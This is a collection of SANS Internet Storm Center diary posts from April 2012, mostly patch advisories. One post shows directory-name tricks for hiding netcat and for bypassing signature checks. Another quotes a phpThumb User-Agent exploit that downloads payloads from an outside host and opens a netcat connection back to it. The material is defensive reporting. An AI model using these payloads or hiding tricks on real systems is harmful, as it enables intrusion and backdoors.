OpenSSL Security Advisory - CVE-2012-2110

Earlier today, the OpenSSL team released a fix for a recently discovered vulnerability that exposes applications using certain features of OpenSSL to a heap overflow.

Since OpenSSL is used extensively, there is much speculation and discussion about who is vulnerable.  Here are some highlights and links of the reading I've done today.  

  • UPGRADE to the latest version as soon as you can. [1]
  • The SSL/TLS code of OpenSSL is *not* affected. [1]
    This means OpenSSH is NOT vulnerable.
  • Read a good detailed explanation of the vulnerability by Tavis Ormandy.  [2]  
    Tavis is credited with discovering the vulnerability. 
  • If Apache is using PEM for certificates, and not parsing untrusted data, then your risks are lower. [1]

[1]  http://www.openssl.org/news/secadv_20120419.txt
[2]  http://lists.grok.org.uk/pipermail/full-disclosure/2012-April/086585.html

Feel free to post a comment to discuss anything not spoken for in this diary.

ISC Handler on Duty


Published: 2012-04-18

ISC Feature of the Week: Suspicious Domains

After some maintenance downtime, the Suspicious Domains lists at https://isc.sans.edu/tools/suspicious_domains.html have been re-launched. This project was developed by handler Jason Lam and is an effort to assemble weighted lists of suspicious domains based on tracking, malware and other sources.


Background - https://isc.sans.edu/tools/suspicious_domains.html#background

  • Project description, sources cited and suggested uses of project data.

Lists By Level - https://isc.sans.edu/tools/suspicious_domains.html#lists
Domain lists linked here are categorized by Low, Medium and High sensitivity.

  • The lower the sensitivity, the fewer false positives.
  • Lists are based on ranges so they will overlap at each level.

Domain Whitelist - https://isc.sans.edu/tools/suspicious_domains.html#whitelist
Links to lists of approved and pending known-good domains. Submissions will be reviewed for approval and the form is limited to the following:

  • 20 submissions per 24 hour period
  • Submit one domain at a time
  • Domain must be on one of the current Lists by Level
  • Domain whitelisted will automatically be removed 7 days after dropping off Lists by Level

Search the Lists - https://isc.sans.edu/tools/suspicious_domains.html#search

  • Search for domain history and details:
    • Enter a domain from one of the Lists by Level to view First Added, Last Seen, Source and Whitelist details.
  • Create a custom domain list file:
    Choose criteria on this form to refine a custom suspicious domain list! Results are displayed in a text box so you can easily select all and copy for use.
    • Limit Score Range between 0 to 100 (the higher the score, the more sensitive the domain)
    • Refine Domain Names by Any, All or Like
    • Occurs a minimum of n times


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu


Published: 2012-04-18

Sysinternals Updates - 2012 Apr 17

In case you have not seen or heard, some of our readers pointed us to Monday's posting on the Sysinternals Site Discussion panel about a number of updates that are now available.  

Among the release are updates to the following:

  • NotMyFault
  • Process Monitor v3.01
  • TestLimit v5.2
  • Webcasts from Mark R.
  • Windows Internals 6th Ed. Part 1

Further details can be found at the following url: 


Many thanks to our loyal readers Rene and Roseman for keeping us in the loop.

ISC Handler on Duty




Published: 2012-04-16

McAfee DAT troubles

Thanks to reader Dan for sharing the following information:

McAfee has confirmed that incremental DAT 6682 may trigger message scan failures and a system crash in GroupShield Exchange (MSME), GroupShield Domino, and McAfee Email Gateway 7 (MEG).  McAfee recommends that customers do NOT upload DAT 6682.
More information will be available on the McAfee KnowledgeBase (https://mysupport.mcafee.com) in article KB70380 (https://kc.mcafee.com/corporate/index?page=content&id=KB70380). Please check back to this KB article for further updates.


Published: 2012-04-16

Challenge: What can you do with Funky Directory Names (Part 2)

Following up on last week's challenge, I'd like to add a new element to the challenge, then review some of the EXCELLENT comments we received from our readers. First let's add a new element to the challenge and see how you can creatively make use of symbolic links on Windows. I'll throw a few things out there to get the ball rolling.

1) Using infinitely recursive directories to defeat directory searching scripts: As described in this excellent presentation on "Offensive Countermeasures" by my friends John Strand and Paul Asadoorian, you can create symbolic links to the current working directory to cause directory searches to get stuck in an infinite loop. They begin talking about it at the 25 minute mark in this video: http://www.youtube.com/watch?v=p0gWAbMjg1U In short, you can create symbolic link directories to the current directory and cause anyone searching your hard drive (including malware and antivirus scans) to get caught in an infinite loop.

2) Create links to devices such as the boot sector and to alternate data streams:

You can use symbolic links to access items in alternate data streams and items in disk partitions that are normally not easily accessed. For example, if you have a separate boot partition you can use symbolic links to access it and even hide files in it.



3) Symbolic links to Volume Shadow Copies:

Windows Volume Shadow Copies automatically maintain backups of the last 5-15 percent of all changes on your computer. It is a bit like Apple's Time Machine without the fancy GUI or the offline storage. This link shows you how to step back in time and see exactly what was on your systems a few days ago. Oh, you thought you deleted those files? You might want to check this out.


Interestingly, you can also stage malware in volume shadow copies and then execute the malware directly from the shadow copy.



So there you go. What can you do with symbolic links? We still don't have an explanation for the error message or strange behavior noted in the last challenge. What can you tell us about them? POST A COMMENT or SEND ME AN EMAIL! If you missed them, here are some of the great comments we got from readers of the last challenge:

 Original Comments and challenge are here: https://isc.sans.edu/diary/Challenge+What+can+you+do+with+funky+directory+names+/12958

Reader comments: Add a space to the filename to bypass digital signature checks in Microsoft policies.

This was a very interesting comment from reader Aaron. It seems that Aaron had some success bypassing digital signature checks. He reports that the process that checks a digital signature may ignore spaces at the end of the file name, causing Windows to check the actual file with a good signature. The result is that malware named "svchost.exe " (svchost.exe with a space at the end) may appear to be digitally signed to some apps. That's all I'll say about that one.


Reader comments: Creating extended-character directory names with the Alt key and numeric keypad.

As you probably know, we can use the Alt key and the numeric keypad to type extended ASCII characters. Combine that with the ability to create files and directories with normally prohibited characters and you've got some PRETTY directories on your hands. Create smiley faces, hearts, diamonds and other interesting directories on your Windows systems.



Reader comments: Still no answer for the strange 8.3 names given to files/directories

We had several excellent comments and emails on the strange 8.3 directory names created when you create a directory or file with a character in its name that is prohibited by the normal file/directory creation process. Normally 8.3 short names are only given to files or directories whose names are longer than 8 characters. In this case, the 8.3 names are assigned seemingly at random to these files even though they are not more than 8 characters long.
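As an added example (not code from the diary or from the presenters it cites), here is a Python directory scan written from the defender's side: it flags the padded and extended-character names discussed above, reports symbolic links for review, and survives a link back to a parent directory instead of recursing forever. The temporary tree it builds and scans is constructed for demonstration and assumes a POSIX host.

```python
"""Defensive directory scan that tolerates the tricks discussed above.

Added example for this diary, not code from the ISC or the presenters cited.
It flags names padded with trailing spaces or dots (". ", ".. ", "svchost.exe "),
names containing control or extended (Alt+numpad) characters, symbolic links,
and link loops that would trap a naive recursive search. All checks are
heuristics: review what is flagged rather than acting on it automatically.
Standard library only.
"""
import os
import shutil
import tempfile


def suspicious_name_reasons(name):
    """Return a list of heuristic reasons a file or directory name looks odd
    (an empty list means nothing was noticed)."""
    reasons = []
    if name != name.rstrip(" ."):
        reasons.append("trailing space or dot in name")
    if name.strip(" ") in (".", ".."):
        reasons.append("looks like '.' or '..' with padding")
    if any(ord(c) < 32 for c in name):
        reasons.append("control character in name")
    if any(ord(c) > 126 for c in name):
        reasons.append("extended (non-ASCII) character in name")
    return reasons


def safe_walk(root):
    """Walk root iteratively and return {relative_path: [reasons]}.

    Directories are identified by (device, inode) after following links, so a
    symbolic link or junction pointing back at an ancestor is reported once and
    never descended into again; the walk therefore always terminates.
    """
    findings = {}
    seen = set()
    stack = [root]
    while stack:
        current = stack.pop()
        try:
            st = os.stat(current)  # follows links on purpose
        except OSError:
            continue
        ident = (st.st_dev, st.st_ino)
        rel = os.path.relpath(current, root)
        if ident in seen:
            findings.setdefault(rel, []).append(
                "link loop: resolves to a directory already visited")
            continue
        seen.add(ident)
        try:
            entries = list(os.scandir(current))
        except OSError:
            continue
        for entry in entries:
            reasons = suspicious_name_reasons(entry.name)
            if entry.is_symlink():
                reasons.append("symbolic link (verify its target)")
            if reasons:
                findings.setdefault(
                    os.path.relpath(entry.path, root), []).extend(reasons)
            if entry.is_dir():  # also True for a link to a directory
                stack.append(entry.path)
    return findings


def build_demo_tree():
    """Create a constructed temporary tree with the cases discussed above:
    a '. ' directory holding a '.. ' subdirectory, a trailing-space executable
    name and a link back to the root. Returns the root path. Written for a
    POSIX host: on Windows, padded names need the extended-length path prefix
    and creating symbolic links needs privilege."""
    root = tempfile.mkdtemp(prefix="funky_")
    os.makedirs(os.path.join(root, ". ", ".. "))
    open(os.path.join(root, "svchost.exe "), "w").close()
    os.symlink(root, os.path.join(root, "loop"))
    return root


def run_demo():
    """Build the tree, scan it, clean up and return the findings."""
    root = build_demo_tree()
    try:
        return safe_walk(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, why in sorted(run_demo().items()):
        print(repr(path), "->", "; ".join(why))
```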

HEY! I'm teaching SANS SEC560 BOOTCAMP Style in Augusta GA June 11th - 16th.   Sign up today!  http://www.sans.org/community/event/sec560-augusta-jun-2012



Published: 2012-04-15

.Net update affects printing from some applications

We have received comments from our readers that the most recent Microsoft .Net framework update may have affected printing from some applications. TurboTax has released an update to address this issue in their software and Microsoft has updated the MS12-025 KB article to indicate they are aware of the problem.

Microsoft's suggested workaround is:

"To print from an affected Windows Forms application, print the content to a file on your computer instead of directly printing to a printer device. For example, print to a PDF, XPS, or any other supported format file. You can then open the file that you created and print directly from there."

If you are aware of other software affected by this issue, please let us know through our comment section or via our contact form.

-- Rick Wanner - rwanner at isc dot sans dot org - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Published: 2012-04-14

Flashback Trojan Removal Tool Released

Earlier in the week Apple released a Java update which included software to remove the Flashback Trojan from OS X Lion machines running Java.

The Flashback Trojan removal tool is now also available for OS X Lion machines not running Java. This Flashback malware removal tool is available through the OS X Software Update tool, or from Apple's downloads site at http://www.apple.com/support/downloads/


-- Rick Wanner - rwanner at isc dot sans dot org - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Published: 2012-04-13

Anti-virus scanning exclusions

Reader Josh writes in with a good question: How does everyone deal with software whose vendor requires that the application and its install directories be excluded completely from Anti-Virus (AV) scanning? Microsoft has some recommendations for AV exclusions of their own, as do the anti-virus companies themselves (example: McAfee), and googling a bit quickly shows that pretty much every software vendor has knowledge base articles that deal with making their particular tool invisible to AV.

- How do you keep track of the various "approved" exclusions across servers in your company?
- How do you make sure no malware is hiding or setting up shop in those excluded portions?
- Any other comments you might have ..

If you have a couple of minutes before starting your weekend, please share in the comments below!


Published: 2012-04-13

ISC Feature of the Week: Get to know the Handlers


All of the Internet Storm Center's active handlers are listed on https://isc.sans.edu/handler_list.html. Click a name to expand and see the handler's details. Click the link if you are interested in how to become an Internet Storm Center Handler.


  • A picture of the handler will be on the left if available, otherwise a shadow avatar is shown.
  • If a handler has information posted on http://handlers.sans.edu/, there will be a link to their specific page. We are working towards migrating this site to the new layout and adding more features.
  • A list of the 5 most recent diaries written by the selected handler is shown and linked.
  • If the handler has a public Twitter handle, a direct link to their twitter.com page is listed.


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form.
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu


Published: 2012-04-13

Oracle CPU Patches announced for Apr 17

Oracle have released their announcement for the April 2012 "Critical Patch Update", to be issued next Tuesday (Apr 17).

Several of the patch descriptions in the announcement are accompanied by the ominous words "may be exploited over a network without the need for a username and password". Sounds like next Tuesday will be busy for administrators of Oracle databases and middleware products.


Published: 2012-04-12

Apple Java Updates for Mac OS X

This Java security update removes the most common variants of the Flashback malware. "Java for OS X Lion 2012-003 delivers Java SE 6 version 1.6.0_31 and supersedes all previous versions of Java for OS X Lion." [1] Apple recommends that all Mac users install this update where Java is installed.

OS X Lion v10.7.3, OS X Lion Server v10.7.3
Impact: The Java browser plugin and Java Web Start are deactivated if they remain unused for 35 days

For OS X Lion systems
Download file: JavaForOSX.dmg

Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.3, OS X Lion Server v10.7.3
Impact: A Flashback malware removal tool will be run

For Mac OS X v10.6 systems
Download file: JavaForMacOSX10.6.dmg

Java for OS X 2012-003 and Java for Mac OS X 10.6 Update 8 are available via the Software Update pane in System Preferences or via the Apple web site here [2].

[1] http://support.apple.com/kb/HT5242

[2] http://www.apple.com/support/downloads/


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-04-12

wicd Privilege Escalation 0day exploit for Backtrack 5 R2

A vulnerability was found in the current Backtrack 5 R2 version of the "Wicd" (Wireless Interface Connection Daemon) software, where several design flaws have been found culminating in a privilege escalation exploit. [1]

To address this vulnerability (CVE-2012-2095), Wicd 1.7.2 was released; several other fixes have also been included in this update. The list of fixes is available here [2][3] and the latest tarball can be downloaded here [4].

[1] http://www.infosecinstitute.com/courses/ethical_hacking_training.html
[2] https://launchpad.net/wicd/+announcement/9888
[3] https://bugs.launchpad.net/wicd/+bug/979221
[4] https://launchpad.net/wicd/1.7/1.7.2/+download/wicd-1.7.2.tar.gz


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-04-12

HP ProCurve 5400 zl Switch, Flash Cards Infected with Malware


HP has released a security bulletin (CVE-2012-0133) indicating that a "[...] vulnerability has been identified with certain HP ProCurve 5400 zl switches containing compact flash cards which may be infected with a virus. Reuse of an infected compact flash card in a personal computer could result in a compromise of that system's integrity." [1]

A list of HP 5400 zl series switches purchased after April 30, 2011, with their serial numbers, as well as a resolution, is posted here [1].

[1] http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03249176


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-04-11

Challenge: What can you do with funky directory names?

Good day readers!   I've been playing around with creating unusual file names for a while.   (http://vimeo.com/9484706 , http://pauldotcom.com/2011/12/looking-for-stealth-ads-stream.html)   For example, did you know you can create a ".. "  (dot dot space) directory on Windows just like you can in Linux?   Want to try it?   Open up a command prompt and type this:

That's interesting.   Notice that our ".. " (dot dot space) directory is indistinguishable from the normal parent directory and is easily overlooked.   Attackers have been hiding in the "dot dot space" directory for a long time on the Linux platform.   Now try this from an administrative command prompt:

We created a ". " (dot space) directory with a ".. " (dot dot space) subdirectory. Then we put a copy of netcat in it. (Your path to nc.exe may be different from this example.) As you see from the image above, you can still execute netcat without any problems if you use a symbolic link. Now try and browse to the c:\temp\ directory using the Windows Explorer GUI. You will notice the SHORTCUT to NC.EXE in our c:\temp directory. Double-click on the ". " (dot space) directory. You might expect that it would take you into a directory containing our ".. " (dot dot space) directory, but it doesn't! Instead we are still in the c:\temp directory with our shortcut to nc.exe! Double-click the ". " (dot space) directory again. This time we DO change to the directory containing ".. " (dot dot space). Weird! Now, double-click your ".. " (dot dot space) directory. Where will that take you? It takes you to the following error message:

Interesting.  Now try this.  Open your command prompt and change directories to the path "c:\temp\2628~1\45AA~1\" and do a directory listing.  This strange directory name has been consistent in my limited testing.  Is it the same for you?  There is your copy of nc.exe!   What the heck is that?

Your mission, should you choose to accept it, is to tell me what you can do with this.   What causes this behavior?  Post a comment!

HEY! I'm teaching SANS SEC560 BOOTCAMP Style in Augusta GA June 11th - 16th.   Sign up today!  http://www.sans.org/community/event/sec560-augusta-jun-2012



Published: 2012-04-10

SAMBA "root" credential remote code execution.

Samba - "a Windows SMB/CIFS fileserver for UNIX" - seems to have a serious security vulnerability: Samba version 3.6.3 and all versions prior to it allow remote code execution as the "root" user from an anonymous connection.

Yep, time to upgrade SAMBA.


Hat tip: Charlie

Swa Frantzen -- Section 66


Published: 2012-04-10

Adobe April 2012 Black Tuesday Update

Adobe released its Black Tuesday bulletin too: apsb12-08.html announcing updates of Adobe Reader and Adobe Acrobat to versions 9.5.1 and 10.1.3.

They're fixing 4 vulnerabilities:

All of them allow random code execution.

This update also incorporates the recent changes to flash for the version "X" (10.1.3).

Swa Frantzen -- Section 66


Published: 2012-04-10

Microsoft April 2012 Black Tuesday Update - Overview

Overview of the April 2012 Microsoft patches and their status.

# | Affected | Contra Indications - KB | Known Exploits | Microsoft rating(**) | ISC rating(*) clients | ISC rating(*) servers
MS12-023 | Cumulative update for Internet Explorer adding fixes for 5 more random code execution vulnerabilities with the rights of the logged-on user. Replaces MS12-010. | KB 2675157 | No publicly known exploits. | Severity: Critical | Critical | Important
MS12-024 | Windows Authenticode. An input validation vulnerability in the parsing of the signatures on executable files allows random code execution with the rights of the logged on user. Replaces MS10-019. | KB 2653956 | No publicly known exploits. | Severity: Critical | Critical | Critical
MS12-025 | An input validation failure in the .NET framework allows random code execution with the rights of the logged on user. This not only affects users browsing websites but also IIS servers running ASP.NET in e.g. a web hosting scenario. | KB 2671605 | No publicly known exploits | Severity: Critical | Critical | Critical
MS12-026 | Forefront UAG. Vulnerabilities in Forefront UAG (Unified Access Gateway) allow unfiltered access to internal resources and spoofing of the UAG webserver (directing the visitor to malicious sites instead of the UAG server, potentially compromising their login credentials). | KB 2663860 | No publicly known exploits | Severity: Important | NA | Critical
MS12-027 | Windows Common Controls. A vulnerability in Windows Common Controls [ActiveX] allows random code execution with the rights of the logged-on user. Attack vectors include websites and email attachments. Also affects a whole lot of other Microsoft software such as SQL server, Commerce Server, Visual FoxPro, Visual Basic runtime aside of Microsoft Office. | KB 2664258 | Microsoft claims to be aware of "limited targeted attacks" using this. | Severity: Critical | Critical | Important
MS12-028 | Office - Works. An input validation vulnerability in the .wps converter allows random code execution with the rights of the logged on user. Replaces MS09-024 and MS10-105. | KB 2639185 | No publicly known exploits | Severity: Important | Critical | Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

Swa Frantzen -- Section 66

NOTE: These security updates also included an update for Windows 8 Consumer Preview. Updates for Windows 8 are available through the operating system's Windows Update. (Thanks Rene! - Mark Baggett)


Published: 2012-04-10

Windows Vista RIP

Microsoft Windows Vista was your full name. Internally you identified yourself as Windows 6.0. Most would call you simply Vista. You were never liked all that much. In part this was due to your security inspired nanny attitude. Despite that, you carried a lot of essential and long overdue security improvements. Improvements which allowed, e.g., the practical removal of administrator rights without impacting the users of software written under the false presumption that users should have administrative rights.

The market has rejected you and killed you off. Your last copies went over the counter in October 2011 according to your maker. And finally, today that same maker buries you too: Microsoft is stopping support for Windows Vista today.

There is some hope that consumer rights groups will fight such a short lifespan of support and patches (e.g. in Europe there's a mandatory 2 year warranty requirement for products sold to consumers), but overall and for all practical purposes, you're about to be forgotten by all but a handful who'll send significant donations to your maker.

So you will nonetheless live on for a while -for a maximum of 5 more years- through extended support as well as through your technically very closely related sibling Windows 7 (which identifies itself internally as windows 6.1 in a sort of tribute to you), and which was given a bit better of an education on how to interact with the public by the maker's marketing department.

Still those that have you will now have to decide to bury you in the trashcan or pay for extended support.


- Hat Tip: Rene
- I hope this doesn't offend any of our readers. it's only meant to be a bit sarcastic and to lighten up the rainy day a bit.

Swa Frantzen -- Section 66


Published: 2012-04-09

Not your Parent's Wireless Threat

Back in the good old days, wireless threats could be summarized as "secure your 802.11x access point by picking a strong passphrase and do not connect to evil unknown access points". I am not sure if this was ever quite right, but it certainly isn't right today. Cheaper hardware, in particular software defined radios with easily accessible open drivers, makes larger ranges of the spectrum available to intrusion and detection by non-nation state funded attackers. At the same time, wireless technologies are proliferating at an amazing pace. As much as possible, I am trying to write up a very brief summary of the various technologies. I am sure I forgot some. If so, please add via comments:

802.11: This set of standards deals with wireless LAN communication, and the most commonly known parts of it (a, b, g and n) are probably the most common and most easily accessible wireless networking technologies. It uses frequencies in the 2.4 GHz and 5 GHz bands. (For all frequency mentions here: there tend to be local/national differences in what part of the spectrum is exactly used.) At this point, speeds in excess of 100 MBit/sec can be reached, and extensions are in the works to push this beyond 1 GBps. The range is typically in the "residential property" scale but can be extended over several km with special gear. Various optional encryption and authentication methods are available, but have to be configured. The cost to an attacker to sniff/attack 802.11 is probably in the $10 range.

Bluetooth: Meant to be a standard to replace pesky cables to connect devices like headsets to phones, the focus of this standard is low power and low cost. There is a simple but pretty effective encryption mechanism built in. However, it frequently is limited by the ability of the user to enter a complex PIN code using a one button headset. The range is typically shorter than 802.11 but can reach tens of meters. Bluetooth uses the 2.4 GHz band. To effectively attack Bluetooth, you need to be a bit more specific on what Bluetooth dongle to use than with 802.11, which is why I rate the cost of attack at $50.

DECT: This standard is mostly used in cordless phones, again operating in the unlicensed spectrum (900 MHz, 2.4 GHz, 5 GHz). Range is similar to 802.11. Encryption is somewhat optional. Equipment to sniff DECT calls is not as readily available, as only very specific cards can be used. Typically you need to import equipment, and you may be breaking some US import laws if you do so. However, the equipment still tends to be pretty cheap consumer grade PCMCIA cards. I will assign them a value / cost of $100.

Zigbee (802.15.4): Zigbee is a bit the new kid on the block, but it is growing quickly in the home automation and alarm system world. The "Killerbee" project is providing open source tools to attack and sniff Zigbee. The hardware supported by Killerbee costs around $50. Range is very similar to Bluetooth.

RFID: RFID is very different from the technologies above as it is frequently used with "remote power". The RFID reader has to send out a sufficiently strong signal to power the RFID tag and to read the information embedded in it. There are a number of different sub-standards in how the information is exactly encoded. Readers are pretty cheap, also in the $50 range. If you want to create your own cards, you may need to pay a bit more (let's say $100?). RFID attacks can be dangerous if they are used to clone touchless door access keys. Some credit cards allow reading of the name and card number. Realistically, the range of RFID is a couple of meters. Defense is pretty easy. You don't need a full Faraday cage wallet. Just adding a credit card size piece of aluminum to your wallet will typically provide enough interference to make the tag not readable.

NFC: an extension to RFID which starts to show up in mobile phones. Just like RFID it is low power and limited to short distances. Attackers cost: $100

Cell phones: That may make a nice diary in itself in the future. I am just wrapping them all up in one for the quick discussion here (GSM, GPRS, EDGE, LTE...). Attacking these systems is technically and legally more difficult. It typically requires specific equipment and some expertise. But once set up, an attacker may set up a fake cell phone tower used to record or re-route phone calls. I would rate the cost of the attack in the $1000-$10,000 range (hard to tell with all the different standards. Some old analog standards can be "sniffed" with a decent radio scanner). There isn't much you can do to defend against this, other than using encrypted connections inside the cell phone channel.

X10: A home automation wireless standard. Pretty much unencrypted. All you need is a transmitter set to the right "house code" (one out of sixteen). Cost: $50

Wireless mice/keyboards: These devices typically use more proprietary standards, but they have been shown to be quite weak cryptographically and easy to attack. It does require somewhat customized hardware in some cases. However, recently more and more of these devices use Bluetooth (cost: $50-$100).

Other standards: Z-Wave (home automation, 900 MHz or 2.4 GHz, uses 128-bit AES), WiMax (wireless network technology in licensed spectrum for larger distances, aka "4G" by some carriers competing with LTE).

Many of these standards can be used to exfiltrate short range data. Or if they are used in alarm systems and door access controls, they can be used to assist in a physical attack. 


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-08

Blog Log: More noise or a rich source of intelligence?

The Internet Storm Center has always advocated spending time monitoring and reviewing your logs, whether they are your personal systems or the ones at the office. Logs should be full of useful information so becoming accustomed to normal events helps quickly identify those outliers which can mean something worth looking at is going on. One of the key points to note; you, not the factory defaults, have to make the information in the logs actually useful.

When I first set up a blog, looking through what it logged, I found little of help or use to determine the threats my little spot on the internet faced. That was the default out of the box set up, and millions of blogs are configured to effectively tell their owners little or no information on the bad stuff*. A quick bit of searching pulled up a number of plugins to log details of all activities: IP address, action, user agent, etc. and neatly drop them into a database. As it's using a well-known blog engine that's had more than its fair share of troubles, it receives a healthy dose of attention from the automated denizens of the Internet. With the plugins it's reasonably easy to split up these net denizens between good automatons and downright bad. The good-ish connections are from search engine bots [2], all doing relatively benign indexing of the site; then we have evil flying monkey bots: spammers and automated attacks.

With the right information now being logged, automated attacks are very easy to spot, especially the password guessing attacks on default accounts. This immediately provides a list of known bad IP addresses being used with malicious intent. The SPAM entries have to be taken as bad IP addresses too: even though many take SPAM to be just an annoyance, these systems clearly aren't playing nicely and are most likely being directed to post messages without their owner's consent.

These two lists of IP addresses can be added to one big block list in the site's .htaccess file [3], or further broken down into sub-types and groups to build a fuller profile, if you're that way inclined, as two examples of proactive actions.

Logs can be a rich source of data for many reasons, but only if configured, tweaked and then parsed. If you still don't think it's worth the time to read logs and pull valuable data out of them, read any of the technical details on the major breaches in the press. Password guessing, command injection and SQL injection attacks are incredibly easy to spot - if the right data is logged and you're looking for it.

[1] Example of what can be logged http://httpd.apache.org/docs/2.0/mod/mod_log_config.html
[2] Example of some of the more common search bots strings http://user-agent-string.info/list-of-ua/bots
[3] http://www.htaccess-guide.com/

*Now if you have permissions to the access log – the log which shows details [1] on every connection to your site - that’s a different story, but that’s normally up to the hosting provider if they allow it.


Chris Mohan --- Internet Storm Center Handler on Duty


Published: 2012-04-07

Phishing and client side attacks, the future?

I've been involved in a few penetration tests recently and one thing that seems to be happening is that privileged access is harder to come by. It used to be: start at 9, have admin by 9:30 (on a slow day). Today it certainly tends to be a lot more work.

I put it down to improvements in security over the last few years in many organisations, as well as improvements in operating systems. Love it or hate it, Windows 7 does a pretty good job of securing the machine. Combined with some practices like no local user admins, automatic patching and a decent HIPS, it can be quite a challenge to compromise a fully patched and well managed Windows box. OS X similarly has made some steps towards improving the security of the OS (if only they turned the firewall on by default :-( ). So if the operating system is pretty good and likely to get better, the attack vectors have to shift. Which is where client side attacks enter the picture: get the user to attack their system for you.

We have had some good examples of this in the past year where sites were reportedly compromised because someone clicked something they should not have, likely delivered via email. Just like the wooden horse, the gift was accepted (phishing email) and the trojan held the nasty surprise.

So on this long weekend (for many of you), I'd like you to have a little think and maybe complete the poll on the page or enter comments here. Phishing/social engineering emails and client side attacks: something we are going to see a lot more of in the future, or a passing fad?

Have a nice Easter for those that celebrate it.  Have a great weekend for those that do not. 




Published: 2012-04-06

Another OS X Java Patch

Only a couple days after releasing the critically late Java patch (2012-001), Apple released another Java update. At this point, Apple's site doesn't mention what this new patch fixes, or why it was released. But eventually, you may see details at http://support.apple.com/kb/HT1222 . Too bad that Apple isn't getting its security house in order. It appears that OS X has reached a level of market penetration that would require a company with a meaningful security response capability behind it.

Just a couple of additional pointers for OS X security:

- Sophos is making a free Antivirus product for OS X. I have been running it for a few months now without bad side effects. http://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-mac-home-edition.aspx

- You can try and enable "Gatekeeper" on OS X Lion. This feature will prevent unsigned software from running. It will be fully integrated once the next version of OS X (Mountain Lion, OS X 10.8) arrives, but has been included in OS X 10.7.3. To activate it, you need to run: sudo spctl --enable . Expect it to complain about a lot of "normal" software, as most OS X software right now is not yet signed (but you can always allow it to run anyway).

Otherwise: Keep good backups... 

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-06

Social Share Privacy

For quite a while now, we have used the "Add This" toolbar to allow readers to quickly share articles with various social networks. As a security site, we talk a lot about the risks of social networks, but we can't ignore them. Our mission is to get the word out about current security issues. Social media are becoming an important tool to assist us with that.

At the same time, we are very aware of the privacy issues. Lucky for us, the German technology website Heise Online came up with a great solution. The "Social Sharing Privacy" toolbar we are using as of today will not leak any data about you to social networks or companies like "Add This" until you explicitly turn on the toolbar. If you would like to share a story via Twitter/Facebook/Google, you will first need to turn on the toolbar (which will load the actual images from the respective sites) and then you are able to "share".

I hope this will not prevent too many of you from sharing our stories to your social media accounts. We will still tweak the toolbar a bit. Please let us know if you see issues with specific browsers (we are usually testing with Safari on OS X, Firefox on Linux and sometimes even with IE on Windows).

Plugins for popular tools like Wordpress are available.

Social sharing privacy source code: http://www.heise.de/extras/socialshareprivacy/
This blog post helped me quite a bit: http://benjamin-steininger.de/2011/12/07/extending-heise-socialshareprivacy-to-pass-a-dynamic-title-to-twitter/



Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-05

Evil hides everywhere: Web Application Exploits in Headers

This topic has come up before, but it is probably worthwhile noting that of course any data provided by the user can be used against a web application, not just proper "POST" and "GET" data. For example, we had a couple of readers point us to a recent blog post on SQL injection via HTTP headers [1] and how many web application vulnerability scanners miss them.

Another reader (Thanks Ovi!) sent us an interesting example "hiding" the exploit in the browser's user agent field. The exploit is directed at the infamous "phpThumb" tool, and again, isn't new (see for example the post by Spiderlabs [2]). The vulnerability was discovered originally in 2010 and assigned CVE-2010-1598.  The bug wasn't fixed until about a year ago when version 1.7.10 of phpThumb was released [3].

Let's take a quick look at the "mechanics" of this exploit and the vulnerability. First of all, the exploit's User Agent (I formatted it for readability, but the "pel" command, which IMHO is a typo, came from the original):

<!--?system('cd /var/tmp;
                wget http://xyz.244.68.88/cb.jpg;
                perl cb.jpg xyz.103.68.73 8004;
                wget http://xyz.244.68.88/cback;
                pel cback;
                cd /dev/shm;
                curl -O http://xyz.244.68.88/cb.jpg;
                perl cb.jpg xyz.103.68.73 8004;
                netcat xyz.103.68.73 8004;
                curl -O http://xyz.244.68.88/cback;
                perl cback;nc xx.103.68.73 8004');
?-->[... second attempt in same user agent omitted ...] 
Googlebot/2.1 (+http://www.google.com/bot.html)


In essence, the script appears to install some form of backdoor. The original servers the exploit connected to are no longer accepting requests, so we couldn't test it. The script uses wget as well as curl to download the file in case one of these tools is not installed.

